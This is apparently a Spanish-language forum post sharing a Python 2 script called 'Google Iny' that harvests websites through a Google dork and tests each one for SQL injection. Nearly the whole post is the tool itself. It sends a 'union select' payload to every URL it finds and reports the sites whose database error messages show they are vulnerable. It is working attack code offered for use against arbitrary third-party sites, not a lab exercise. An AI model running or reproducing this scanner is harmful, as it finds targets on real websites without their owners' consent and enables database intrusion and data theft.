Bueno , acabo de hacer un scanner de sqli.
Este busca en google paginas con un dork marcado por ustedes
, para despues borrar repetidos y scanear las webs encontradas
#!usr/bin/python
#Google Iny (C) Doddy Hackman 2011
import urllib2,re,os,sys
def head():
print "\n\n -- == Google Iny == --\n"
def copyright():
print "\n(C) Doddy Hackman 2011\n"
sys.exit(1)
def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()
def show():
print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"
def limpiar(pag):
limpia = []
for p in pag:
if not (re.findall("http://www.google.com.ar",p,re.I)):
if p not in limpia:
limpia.append(p)
return limpia
def sql(webs):
for web in webs :
if re.findall("=",web):
web = re.split("=",web)
web = web[0]+"="
try:
code = toma(web+"-1+union+select+1--")
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
print "[SQLI] : ",web,"\n"
except:
pass
def scan(dork,count):
pag = []
s = 10
while s <= int(count):
try:
code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
s += 10
for a in d:
pag.append(a)
except:
copyright()
pag = limpiar(pag)
return pag
head()
if len(sys.argv) != 3:
show()
else :
print "\n[+] SQL Scan Started\n"
print "[+] Dork : ",sys.argv[1]
print "[+] Count : ",sys.argv[2]
pages = scan(sys.argv[1],sys.argv[2])
print "\n[+] Webs Found : ",len(pages),"\n"
sql(pages)
copyright()